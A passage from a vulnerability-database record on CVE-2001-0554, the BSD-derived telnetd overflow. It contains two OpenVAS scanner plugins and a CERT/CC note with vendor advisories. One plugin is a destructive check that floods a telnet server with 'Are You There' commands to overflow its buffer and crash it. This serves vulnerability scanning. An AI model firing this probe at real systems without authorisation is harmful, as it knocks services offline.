Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The telnet daemon contained in the netkit-telnet_0.16-4potato1 package in\nthe 'stable' (potato) distribution of Debian GNU/Linux is vulnerable to an\nexploitable overflow in its output handling.\nThe original bug was found by <scut@nb.in-berlin.de>, and announced to\nbugtraq on Jul 18 2001. At that time, netkit-telnet versions after 0.14 were\nnot believed to be vulnerable.\nOn Aug 10 2001, zen-parse posted an advisory based on the same problem, for\nall netkit-telnet versions below 0.17.\nMore details can be found on http://www.securityfocus.com/archive/1/203000 .\nAs Debian uses the 'telnetd' user to run in.telnetd, this is not a remote\nroot compromise on Debian systems; the 'telnetd' user can be compromised.\n\nWe strongly advise you update your netkit-telnet packages to the versions\nlisted below.\";\ntag_summary = \"The remote host is missing an update to netkit-telnet\nannounced via advisory DSA 070-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20070-1\";\n\nif(description)\n{\n script_id(53820);\n script_cve_id(\"CVE-2001-0554\");\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 14:24:38 +0100 (Thu, 17 Jan 2008)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 070-1 (netkit-telnet)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"telnet\", ver:\"0.16-4potato.2\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"telnetd\", ver:\"0.16-4potato.2\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:10:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0554"], "description": "The Telnet server does not return an expected number of replies\nwhen it receives a long sequence of 'Are You There' commands.\nThis probably means it overflows one of its internal buffers and\ncrashes. It is likely an attacker could abuse this bug to gain\ncontrol over the remote host's superuser.\n\nFor more information, see:\nhttp://www.team-teso.net/advisories/teso-advisory-011.tar.gz", "modified": "2017-05-02T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:10709", "href": "http://plugins.openvas.org/nasl.php?oid=10709", "type": "openvas", "title": "TESO in.telnetd buffer overflow", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: teso_telnet.nasl 6056 2017-05-02 09:02:50Z teissa $\n# Description: TESO in.telnetd buffer overflow\n#\n# Authors:\n# Pavel Kankovsky, DCIT s.r.o. <kan@dcit.cz>\n#\n# Copyright:\n# Copyright (C) 2001 Pavel Kankovsky\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"The Telnet server does not return an expected number of replies\nwhen it receives a long sequence of 'Are You There' commands.\nThis probably means it overflows one of its internal buffers and\ncrashes. It is likely an attacker could abuse this bug to gain\ncontrol over the remote host's superuser.\n\nFor more information, see:\nhttp://www.team-teso.net/advisories/teso-advisory-011.tar.gz\";\n\ntag_solution = \"Comment out the 'telnet' line in /etc/inetd.conf.\";\n\n# The kudos for an idea of counting of AYT replies should go\n# to Sebastian <scut@nb.in-berlin.de> and Noam Rathaus\n# <noamr@beyondsecurity.com>.\n#\n# rd: tested against Solaris 2.8, RH Lx 6.2, FreeBSD 4.3 (patched & unpatched)\n\nif (description) {\n script_id(10709);\n script_version(\"$Revision: 6056 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-05-02 11:02:50 +0200 (Tue, 02 May 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_xref(name:\"IAVA\", value:\"2001-t-0008\");\n script_bugtraq_id(3064);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2001-0554\");\n \n name = \"TESO in.telnetd buffer overflow\";\n script_name(name);\n \n\n summary = \"Attempts to overflow the Telnet server buffer\";\n\n \n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n \n script_copyright(\"This script is Copyright (C) 2001 Pavel Kankovsky\");\n\n family = \"Gain a shell remotely\";\n script_family(family);\n\n # Must run AFTER ms_telnet_overflow-004.nasl\n script_dependencies(\"find_service.nasl\");\n\n script_require_ports(\"Services/telnet\", 23);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n#\n# The script code starts here.\n#\ninclude('telnet_func.inc');\n\niac_ayt = raw_string(0xff, 0xf6);\niac_ao = raw_string(0xff, 0xf5);\niac_will_naol = raw_string(0xff, 0xfb, 0x08);\niac_will_encr = raw_string(0xff, 0xfb, 0x26);\n\n#\n# This helper function counts AYT responses in the input stream.\n# The input is read until 1. the expected number of responses is found,\n# or 2. EOF or read timeout occurs.\n#\n# At this moment, any occurrence of \"Yes\" or \"yes\" is supposed to be such\n# a response. Of course, this is wrong: some FreeBSD was observed to react\n# with \"load: 0.12 cmd: .log 20264 [running] 0.00u 0.00s 0% 620k\"\n# when the telnet negotiation have been completed. Unfortunately, adding\n# another pattern to this code would be too painful (hence the negotiation\n# tricks in attack()).\n#\n# In order to avoid an infinite loop (when testing a host that generates\n# lots of junk, intentionally or unintentionally), I stop when I have read\n# more than 100 * max bytes.\n#\n# Please note builtin functions like ereg() or egrep() cannot be used\n# here (easily) because they choke on '\\0' and many telnet servers send\n# this character\n#\n# Local variables: num, state, bytes, a, i, newstate\n#\n\nfunction count_ayt(sock, max) {\n num = 0; state = 0;\n bytes = 100 * max;\n while (bytes >= 0) {\n a = recv(socket:sock, length:1024);\n if (!a) return (num);\n bytes = bytes - strlen(a);\n for (i = 0; i < strlen(a); i = i + 1) {\n newstate = 0;\n if ((state == 0) && ((a[i] == \"y\") || (a[i] == \"Y\")))\n newstate = 1;\n if ((state == 1) && (a[i] == \"e\"))\n newstate = 2;\n if ((state == 2) && (a[i] == \"s\")) {\n # DEBUG display(\"hit \", a[i-2], a[i-1], a[i], \"\\n\");\n num = num + 1;\n if (num >= max) return (num);\n newstate = 0;\n }\n state = newstate;\n }\n }\n # inconclusive result\n return (-1);\n}\n\n#\n# This functions tests the vulnerability. \"negotiate\" indicates whether\n# full telnet negotiation should be performed using telnet_init().\n# Some targets might need it while others, like FreeBSD, fail to respond\n# to AYT in an expected way when the negotiation is done (cf. comments\n# accompanying count_ayt()).\n#\n# Local variables: r, total, size, bomb, succ\n#\n\nfunction attack(port, negotiate) {\n succ = 0;\n soc = open_sock_tcp(port);\n if (!soc) return (0);\n if (negotiate)\n # standard negotiation\n r = telnet_negotiate(socket:soc);\n else {\n # weird BSD magic, is is necessary?\n send(socket:soc, data:iac_will_naol);\n send(socket:soc, data:iac_will_encr);\n r = 1;\n }\n if (r) {\n # test whether the server talks to us at all\n # and whether AYT is supported\n send(socket:soc, data:iac_ayt);\n r = count_ayt(sock:soc, max:1);\n # DEBUG display(\"probe \", r, \"\\n\");\n if (r >= 1) { \n # test whether too many AYT's make the server die\n total = 2048; size = total * strlen(iac_ayt);\n bomb = iac_ao + crap(length:size, data:iac_ayt);\n send(socket:soc, data:bomb);\n r = count_ayt(sock:soc, max:total);\n # DEBUG\n#display(\"attack \", r, \" expected \", total, \"\\n\");\n if ((r >= 0) && (r < total)) succ = 1;\n }\n }\n close(soc);\n return (succ);\n}\n\n#\n# The main program.\n#\n\nport = get_kb_item(\"Services/telnet\");\nif (!port) port = 23;\n\nif (get_port_state(port)) {\n success = attack(port:port, negotiate:0);\n if (!success) success = attack(port:port, negotiate:1);\n if (success) security_message(port);\n}\n\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2020-09-18T20:45:13", "bulletinFamily": "info", "cvelist": ["CVE-2001-0554"], "description": "### Overview \n\nThe telnetd program is a server for the telnet remote virtual terminal protocol. There is a remotely exploitable buffer overflow in telnet daemons derived from BSD source code. This vulnerability can crash the server, or be leveraged to gain root access.\n\n### Description \n\nThere is a remotely exploitable buffer overflow in telnet daemons derived from BSD source code. The buffer overflow occurs in the server's processing of protocol options. A function of the telnet daemon, 'telrcv', processes the protocol options. During the processing of the options, the results of 'telrcv' are assumed to be smaller than an unchecked storage buffer. The size of this buffer is statically defined.\n\nTESO claims that they have a working exploit for the BSDI, FreeBSD, and NetBSD versions affected(see <http://www.team-teso.net/advisories/teso-advisory-011.tar.gz>). Their exploit has been publicly posted on the BugTraq mailing list. We have verified the exploit works against at least one target system. \n \nAccording to a TESO advisory, the following systems with telnetd running are vulnerable to the buffer overflow: \n \n\\- BSDI 4.x default \n\\- FreeBSD [2345].x default \n\\- IRIX 6.5 \n\\- Linux netkit-telnetd version 0.14 and earlier \n\\- NetBSD 1.x default \n\\- OpenBSD 2.x \n\\- Solaris 2.x sparc \n \nTESO indicates that other vendor's telnet daemons have a high probability of being vulnerable as well. FreeBSD has confirmed the following releases are vulnerable: \n \n_\"All releases of FreeBSD 3.x, 4.x prior to 4.4, FreeBSD 4.3-STABLE prior to the correction date.\"_ \n \n--- \n \n### Impact \n\nAn intruder can execute arbitrary code as the user running telnetd, typically root. \n \n--- \n \n### Solution \n\nInstall a patch from your vendor when available. Please continue to check this document for information available from the CERT/CC. \n \n--- \n \nDisallow access to the telnet service (typically port 23/tcp) using firewall or packet-filtering technology. Blocking access to the telnet service will limit your exposure to attacks from outside your network perimeter. However, blocking port 23/tcp at a network perimeter would still allow any users, remote or local, within the perimeter of your network to exploit the vulnerability. It is important to understand your network's configuration and service requirements prior to deciding what changes are appropriate. \n \n--- \n \n### Vendor Information\n\n745371\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Apple __ Affected\n\nNotified: July 24, 2001 Updated: October 04, 2001 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n<http://www.apple.com/support/security/security_updates.html>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### BSDI __ Affected\n\nNotified: July 23, 2001 Updated: August 15, 2001 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nAll current versions of BSD/OS are vulnerable. Patches will be available via our web site at <http://www.bsdi.com/services/support/patches> and via ftp at <ftp://ftp.bsdi.com/bsdi/support/patches> as soon as testing has been completed.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### Caldera __ Affected\n\nNotified: July 24, 2001 Updated: August 20, 2001 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nCaldera has determined that OpenServer, UnixWare 7 and OpenUnix 8 are vulnerable, and we are working on fixes. All of Caldera's Linux supported products are unaffected by this problem if all previously released security updates have been applied. If you're running either OpenLinux 2.3 or OpenLinux eServer 2.3, make sure you've updated your systems to netkit-telnet-0.16. This patch was released in March 2000, and are available from <ftp://ftp.caldera.com>\n\nOpenLinux 2.3:\n\n/pub/openlinux/updates/2.3/022/RPMS/netkit-telnet-0.16-1.i386.rpm\n\nOpenLinux eServer 2.3.1:\n\n/pub/eServer/2.3/updates/2.3/007/RPMS/netkit-telnet-0.16-1.i386.rpm \n\nOpenLinux eDesktop 2.4, OpenLinux 3.1 Server, and OpenLinux 3.1 Workstation are not affected. \n \n--- \n \n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nCaldera has recently released [CSSA-2001-030.0](<http://www.caldera.com/support/security/advisories/CSSA-2001-030.0.txt>) which indicates that the following systems are indeed vulnerable: \n \nAll packages previous to netkit-telnet-0.17-12a on \n \n\\- OpenLinux 2.3 \n\\- OpenLinux eServer 2.3.1 and OpenLinux eBuilder \n\\- OpenLinux eDesktop 2.4 \n\\- OpenLinux Server 3.1 \n\\- OpenLinux Workstation 3.1\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### Cisco __ Affected\n\nNotified: July 24, 2001 Updated: February 01, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE----- \n`\n\n`Cisco Security Advisory: Cisco CatOS Telnet Buffer Vulnerability \n================================================================ \n` \n`Revision 1.0 \n` \n`For Public Release 2002 January 29 at 1500 UTC \n` \n`- ------------------------------------------------------------------------------- \n` \n`Summary \n- ------- \nSome Cisco Catalyst switches, running certain CatOS based software releases, \nhave a vulnerability wherein a buffer overflow in the telnet option handling \ncan cause the telnet daemon to crash and result in a switch reload. This \nvulnerability can be exploited to initiate a denial of service (DoS) attack. \n` \n`This vulnerability is documented as Cisco bug ID CSCdw19195. There are \nworkarounds available to mitigate the vulnerability. \n` \n`This advisory will be posted at ``<http://www.cisco.com/warp/public/707/>`` \ncatos-telrcv-vuln-pub.shtml . \n` \n`Affected Products \n- ----------------- \nCisco's various Catalyst family of switches run CatOS-based releases or \nIOS-based releases. IOS-based releases are not vulnerable. \n` \n`The following Cisco Catalyst Switches are vulnerable : \n` \n` * Catalyst 6000 series \n* Catalyst 5000 series \n* Catalyst 4000 series \n* Catalyst 2948G \n* Catalyst 2900 \n` \n`For the switches above, the following CatOS based switch software revisions are \nvulnerable. \n` \n`+-----------------------------------------------------------------------------+ \n| | Release 4 | Release 5 | Release 6 | Release 7 | \n| | code base | code base | code base | code base | \n|---------------+---------------+---------------+--------------+--------------| \n| Catalyst 6000 | Not | earlier than | earlier than | earlier than | \n| series | Applicable | 5.5(13) | 6.3(4) | 7.1(2) | \n|---------------+---------------+---------------+--------------+--------------| \n| Catalyst 5000 | earlier than | earlier than | earlier than | Not | \n| series | 4.5(13a) | 5.5(13) | 6.3(4) | Applicable | \n|---------------+---------------+---------------+--------------+--------------| \n| Catalyst 4000 | All releases | earlier than | earlier than | earlier than | \n| series | | 5.5(13) | 6.3(4) | 7.1(2) | \n+-----------------------------------------------------------------------------+ \n` \n`To determine your software revision, type show version at the command line \nprompt. \n` \n`Not Affected Products \n- --------------------- \nThe following Cisco Catalyst Switches are not vulnerable : \n` \n` * Catalyst 8500 series \n* Catalyst 4800 series \n* Catalyst 4200 series \n* Catalyst 3900 series \n* Catalyst 3550 series \n* Catalyst 3500 XL series \n* Catalyst 4840G \n* Catalyst 4908G-l3 \n* Catalyst 2948G-l3 \n* Catalyst 2950 \n* Catalyst 2900 XL \n* Catalyst 2900 LRE XL \n* Catalyst 2820 \n* Catalyst 1900 \n` \n`No other Cisco product is currently known to be affected by this vulnerability. \n` \n`Details \n- ------- \nSome Cisco Catalyst switches, running certain CatOS-based software releases, \nhave a vulnerability wherein a buffer overflow in the telnet option handling \ncan cause the telnet daemon to crash and result in a switch reload. This \nvulnerability can be exploited to initiate a denial of service (DoS) attack. \nOnce the switch has reloaded, it is still vulnerable and the attack can be \nrepeated as long as the switch is IP reachable on port 23 and has not been \nupgraded to a fixed version of CatOS switch software. \n` \n`This vulnerability is documented as Cisco bug ID CSCdw19195, which requires a \nCCO account to view and can be viewed after 2002 January 30 at 1500 UTC. \n` \n`Impact \n- ------ \nThis vulnerability can be exploited to produce a denial of service (DoS) \nattack. When the vulnerability is exploited it can cause the Cisco Catalyst \nswitch to crash and reload. \n` \n`Software Versions and Fixes \n- --------------------------- \nThis vulnerability has been fixed in the following switch software revisions \nand the fix will be carried forward in all future releases. \n` \n`+-------------------------------------------------------------------------------+ \n| | Release 4 | Release 5 | Release 6 | Release 7 | \n| | code base | code base | code base | code base | \n|---------------+---------------+---------------+---------------+---------------| \n| Catalyst 6000 | Not | 5.5(13) and | 6.3(4) and | 7.1(2) and | \n| series | Applicable | later | later | later | \n|---------------+---------------+---------------+---------------+---------------| \n| Catalyst 5000 | 4.5(13a) | 5.5(13) and | 6.3(4) and | Not | \n| series | | later | later | Applicable | \n|---------------+---------------+---------------+---------------+---------------| \n| Catalyst 4000 | Not Available | 5.5(13) and | 6.3(4) and | 7.1(2) and | \n| series | | later | later | later | \n+-------------------------------------------------------------------------------+ \n` \n`All previous releases must upgrade to the above releases. CatOS switch software \nrelease 4.5(13a) for the Catalyst 5000 series is expected on CCO by 2002 \nFebruary 4. CatOS switch software release 7.1(2) is expected on CCO by 2002 \nFebruary 4. \n` \n`Software upgrade can be performed via the console interface. Please refer to \nsoftware release notes for instructions. \n` \n`Obtaining Fixed Software \n- ------------------------ \nCisco is offering free software upgrades to remedy this vulnerability for all \naffected customers. Customers with service contracts may upgrade to any \nsoftware release containing the feature sets they have purchased. \n` \n`Customers with contracts should obtain upgraded software through their regular \nupdate channels. For most customers, this means that upgrades should be \nobtained through the Software Center on Cisco's Worldwide Web site at http:// \nwww.cisco.com . \n` \n`Customers whose Cisco products are provided or maintained through prior or \nexisting agreement with third-party support organizations such as Cisco \nPartners, authorized resellers, or service providers should contact that \nsupport organization for assistance with the upgrade, which should be free of \ncharge. \n` \n`Customers who purchased directly from Cisco but who do not hold a Cisco service \ncontract, and customers who purchase through third party vendors but are \nunsuccessful at obtaining fixed software through their point of sale, should \nget their upgrades by contacting the Cisco Technical Assistance Center (TAC). \nTAC contacts are as follows: \n` \n` * +1 800 553 2447 (toll free from within North America) \n* +1 408 526 7209 (toll call from anywhere in the world) \n* e-mail: tac@cisco.com \n` \n`See ``<http://www.cisco.com/warp/public/687/Directory.shtml>`` for additional TAC \ncontact information, including instructions and e-mail addresses for use in \nvarious languages. \n` \n`Please have your product serial number available and give the URL of this \nnotice as evidence of your entitlement to a free upgrade. Free upgrades for non \ncontract customers must be requested through the TAC. \n` \n`Please do not contact either \"psirt@cisco.com\" or \"security-alert@cisco.com\" \nfor software upgrades. \n` \n`Workarounds \n- ----------- \nThe following workarounds can be implemented. \n` \n` * If ssh is available in the code base use ssh instead of Telnet and disable \nTelnet. \n` \n` For instructions how to do this please refer ``<http://www.cisco.com/warp/>`` \npublic/707/ssh_cat_switches.html \n` \n` * Apply Access Control Lists (ACLs) on routers / switches / firewalls in \nfront of the vulnerable switches such that traffic destined for the Telnet \nport 23 on the vulnerable switches is only allowed from the network \nmanagement subnets. \n` \n` For an example see ``<http://www.cisco.com/univercd/cc/td/doc/product/lan/>`` \ncat6000/sw_5_4/msfc/acc_list.htm \n` \n`Exploitation and Public Announcements \n- ------------------------------------- \nThis vulnerability has been exploited to initiate Denial of Service (DoS) \nattacks. \n` \n`This vulnerability was reported by TESO and is detailed at ``<http://www.cert.org/>`` \nadvisories/CA-2001-21.html \n` \n`Status of This Notice: Final \n- ---------------------------- \nThis is a final notice. Although Cisco cannot guarantee the accuracy of all \nstatements in this notice, all of the facts have been checked to the best of \nour ability. Cisco does not anticipate issuing updated versions of this notice \nunless there is some material change in the facts. Should there be a \nsignificant change in the facts, Cisco may update this notice. \n` \n`A standalone copy or paraphrase of the text of this security advisory that \nomits the distribution URL in the following section is an uncontrolled copy, \nand may lack important information or contain factual errors. \n` \n`Distribution \n- ------------ \nThis notice will be posted on Cisco's Worldwide Web site at http:// \nwww.cisco.com/warp/public/707/catos-telrcv-vuln-pub.shtml . \n` \n`In addition to Worldwide Web posting, a text version of this notice is \nclear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail \nand Usenet news recipients: \n` \n` * cust-security-announce@cisco.com \n* bugtraq@securityfocus.com \n* firewalls@lists.gnac.com \n* first-teams@first.org (includes CERT/CC) \n* cisco@spot.colorado.edu \n* cisco-nsp@puck.nether.net \n* comp.dcom.sys.cisco \n* Various internal Cisco mailing lists \n` \n`Future updates of this notice, if any, will be placed on Cisco's Worldwide Web \nserver, but may or may not be actively announced on mailing lists or \nnewsgroups. Users concerned about this problem are encouraged to check the \nabove URL for any updates. \n` \n`Revision History \n- ---------------- \n+-----------------------------------------------------------------------------+ \n| Revision 1.0 | 2002-Jan-29 | For Public Release 2002 January 29 at 1500 UTC | \n+-----------------------------------------------------------------------------+ \n` \n`Cisco Security Procedures \n- ------------------------- \nComplete information on reporting security vulnerabilities in Cisco products, \nobtaining assistance with security incidents, and registering to receive \nsecurity information from Cisco, is available on Cisco's Worldwide Web site at \n``<http://www.cisco.com/go/psirt>`` . This includes instructions for press inquiries \nregarding Cisco security notices. \n- ------------------------------------------------------------------------------- \nThis notice is copyright 2002 by Cisco Systems, Inc. This notice may be \nredistributed freely after the release date given at the top of the text, \nprovided that redistributed copies are complete and unmodified, including all \ndate and version information. \n- ------------------------------------------------------------------------------- \n` \n`-----BEGIN PGP SIGNATURE----- \nVersion: PGP 6.5.8 \nComment: Signed by Sharad Ahlawat, Cisco Systems PSIRT \n` \n`iQEVAwUBPFa4iw/VLJ+budTTAQGkywf9GkyUO77MFWJHqhGR+ZtNpk63NAzK4ath \nTGE/GyRJlht4YXvP4sTuKgRmsBkefXRoFttN0T8G1HytxTfFP75THbh5kk2kRFYo \nR4qcxM6QExs1FbJwx42MOjmD5Cyds8pdZ8ZSGdVTDe96k/0D+BNiN1oe672x1hkM \n6Nrt1wnyRzKj7ZfF7NRnlN7DsR4gAPIIP0yLiP2KLJheqDnZNThANng97i9YP1Mz \ngve9jAwZtiKij6mv0LDG/Jkk/NUl5VijxfuoRFM4ZvAEn8hFYDLnvPJUVb+CvKpt \n3AJ3/J+MBS8EAKTM98sGr5ywp7/cQfXWZsoJAYgHbGtEs3Qy6xbK+w== \n=1bxQ \n-----END PGP SIGNATURE-----`.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### Conectiva __ Affected\n\nUpdated: August 27, 2001 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n`\n\n`- -------------------------------------------------------------------------- \nCONECTIVA LINUX SECURITY ANNOUNCEMENT \n- -------------------------------------------------------------------------- \n` \n`PACKAGE : telnet \nSUMMARY : Remote root vulnerability \nDATE : 2001-08-24 15:43:00 \nID : CLA-2001:413 \nRELEVANT \nRELEASES : 4.0, 4.0es, 4.1, 4.2, 5.0, prg graficos, ecommerce, 5.1, 6.0, 7.0 \n` \n`- ------------------------------------------------------------------------- \n` \n`DESCRIPTION \nThe TESO crew reported on Bugtraq a vulnerability affecting the \ntelnet server which can be used by remote attackers to obtain root \nprivileges. Initially it was thought that the netkit-telnet package, \nused by most linux distributions, was not vulnerable starting with \nversion 0.14, but zen-parse showed later on that those versions, \nincluding the 0.17 one, are also vulnerable. \n` \n \n`SOLUTION \nWe recommend that all users currently using telnet start using \nopenssh instead or some other form of encrypted communication. \nUsers who cannot switch to openssh now should upgrade the telnet \npackage immediately. Please note that no restart is necessary after \nthe upgrade, since telnet is started on demand by inetd. \n` \n \n` REFERENCES: \n1. ``<http://www.securityfocus.com/bid/3064>`` \n` \n \n`DIRECT DOWNLOAD LINKS TO THE UPDATED PACKAGES \n``<ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/telnet-0.17-1U40_1cl.src.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/4.0/i386/telnet-0.17-1U40_1cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/telnet-0.17-1U40_1cl.src.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/4.0es/i386/telnet-0.17-1U40_1cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/telnet-0.17-1U41_1cl.src.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/4.1/i386/telnet-0.17-1U41_1cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/telnet-0.17-1U42_1cl.src.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/4.2/i386/telnet-0.17-1U42_1cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/telnet-0.17-1U50_1cl.src.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/5.0/i386/telnet-0.17-1U50_1cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/5.0/i386/telnet-server-0.17-1U50_1cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/telnet-0.17-1U51_1cl.src.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/5.1/i386/telnet-server-0.17-1U51_1cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/5.1/i386/telnet-0.17-1U51_1cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/telnet-0.17-2U60_1cl.src.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/6.0/RPMS/telnet-server-0.17-2U60_1cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/6.0/RPMS/telnet-0.17-2U60_1cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/telnet-0.17-2U70_1cl.src.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/7.0/RPMS/telnet-0.17-2U70_1cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/7.0/RPMS/telnet-server-0.17-2U70_1cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/telnet-0.17-1U50_1cl.src.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/telnet-0.17-1U50_1cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/telnet-server-0.17-1U50_1cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/telnet-0.17-1U50_1cl.src.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/telnet-0.17-1U50_1cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/telnet-server-0.17-1U50_1cl.i386.rpm>`` \n` \n \n`ADDITIONAL INSTRUCTIONS \nUsers of Conectiva Linux version 6.0 or higher may use apt to perform \nupgrades of RPM packages: \n- add the following line to /etc/apt/sources.list if it is not there yet \n(you may also use linuxconf to do this): \n` \n` rpm [cncbr] ``<ftp://atualizacoes.conectiva.com.br>`` 6.0/conectiva updates \n` \n`(replace 6.0 with the correct version number if you are not running CL6.0) \n` \n` - run: apt-get update \n- after that, execute: apt-get upgrade \n` \n` Detailed instructions reagarding the use of apt and upgrade examples \ncan be found at ``<http://distro.conectiva.com.br/atualizacoes/#apt?idioma=en>`` \n` \n \n`- ------------------------------------------------------------------------- \nAll packages are signed with Conectiva's GPG key. The key and instructions \non how to import it can be found at \n``<http://distro.conectiva.com.br/seguranca/chave/?idioma=en>`` \nInstructions on how to check the signatures of the RPM packages can be \nfound at ``<http://distro.conectiva.com.br/seguranca/politica/?idioma=en>`` \n- ------------------------------------------------------------------------- \nAll our advisories and generic update instructions can be viewed at \n``<http://distro.conectiva.com.br/atualizacoes/?idioma=en>`` \n` \n`- ------------------------------------------------------------------------- \nsubscribe: conectiva-updates-subscribe@papaleguas.conectiva.com.br \nunsubscribe: conectiva-updates-unsubscribe@papaleguas.conectiva.com.br \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.0.4 (GNU/Linux) \nComment: For info see ``<http://www.gnupg.org>`` \n` \n`iD8DBQE7hqHX42jd0JmAcZARAq2tAKDTiE4tzCaFXf8ZCGMLNCE1m+PUfwCg2hpZ \nvPyXIWcdPbi77u2qfgBpUDc= \n=DWFX \n-----END PGP SIGNATURE----- \n`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this 